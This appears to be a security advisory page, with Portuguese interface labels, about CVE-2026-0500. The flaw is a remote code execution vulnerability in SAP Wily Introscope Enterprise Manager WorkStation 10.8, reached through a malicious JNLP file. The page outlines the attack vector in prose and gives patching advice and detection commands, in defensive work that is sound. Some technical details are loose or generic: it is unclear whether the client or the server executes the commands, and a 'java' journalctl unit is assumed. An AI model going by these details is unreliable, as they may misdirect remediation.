Plataforma
sap
Componente
sap-wily-introscope-enterprise-manager-workstation
Corrigido em
10.8.1
CVE-2026-0500 is a critical Remote Code Execution (RCE) vulnerability affecting SAP Wily Introscope Enterprise Manager (WorkStation). This vulnerability allows an unauthenticated attacker to execute arbitrary operating system commands on the victim's machine through a crafted JNLP file. The vulnerability impacts versions 10.8 of the product and is resolved in version 10.8.1.
The impact of CVE-2026-0500 is severe. A successful exploit allows an attacker to gain complete control over the affected system. This includes the ability to read, modify, and delete sensitive data, install malware, and potentially pivot to other systems within the network. The attack vector involves crafting a malicious JNLP file and hosting it on a publicly accessible URL. When a user clicks on this URL, the Wily Introscope Server executes the attacker's commands, leading to full system compromise. This resembles previous JNLP-based exploitation techniques, highlighting the potential for widespread impact if unpatched systems remain exposed.
CVE-2026-0500 was publicly disclosed on January 13, 2026. Its criticality (CVSS 9.6) and the ease of exploitation (requiring no authentication) suggest a high probability of exploitation. While no public proof-of-concept (PoC) has been released at the time of writing, the vulnerability's nature makes it a likely candidate for exploitation in the wild. It is recommended to prioritize patching to prevent potential compromise.
Organizations utilizing SAP Wily Introscope Enterprise Manager (WorkStation) version 10.8, particularly those with publicly accessible instances or those lacking robust network segmentation, are at significant risk. Shared hosting environments where multiple users share the same Wily Introscope Server are also particularly vulnerable.
• linux / server: Monitor system logs (journalctl) for unusual Java process activity or attempts to execute commands via JNLP.
journalctl -u java -g 'JNLP'• generic web: Use curl to check for publicly accessible JNLP files.
curl -I https://<your_wily_server>/<potential_jnlp_path>.jnlp• sap: Review SAP security audit logs for suspicious activity related to the Wily Introscope Server.
disclosure
Status do Exploit
EPSS
0.12% (percentil 31%)
CISA SSVC
Vetor CVSS
The primary mitigation for CVE-2026-0500 is to immediately upgrade SAP Wily Introscope Enterprise Manager (WorkStation) to version 10.8.1 or later. If upgrading is not immediately feasible, consider implementing temporary workarounds such as restricting access to the Wily Introscope Server through a Web Application Firewall (WAF) or proxy, blocking access to potentially malicious JNLP files. Monitor network traffic for suspicious JNLP file downloads and execution attempts. Review and restrict user permissions to minimize the potential impact of a successful exploit.
Aplicar a atualização de segurança fornecida pela SAP conforme a nota 3668679. Isso corrigirá a vulnerabilidade no componente de terceiros e evitará a execução remota de código. Consulte a documentação da SAP para obter instruções detalhadas sobre como aplicar a atualização.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-0500 is a critical Remote Code Execution vulnerability in SAP Wily Introscope Enterprise Manager (WorkStation) allowing attackers to execute OS commands via a malicious JNLP file.
Yes, if you are running SAP Wily Introscope Enterprise Manager (WorkStation) version 10.8, you are affected by this vulnerability.
Upgrade to version 10.8.1 or later to remediate the vulnerability. If immediate upgrade is not possible, implement temporary workarounds like WAF rules.
While no public exploit is currently available, the vulnerability's severity and ease of exploitation suggest a high probability of exploitation in the wild.
Refer to the official SAP Security Advisory for detailed information and remediation steps: [https://www.sap.com/security/bulletins.html](https://www.sap.com/security/bulletins.html)
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.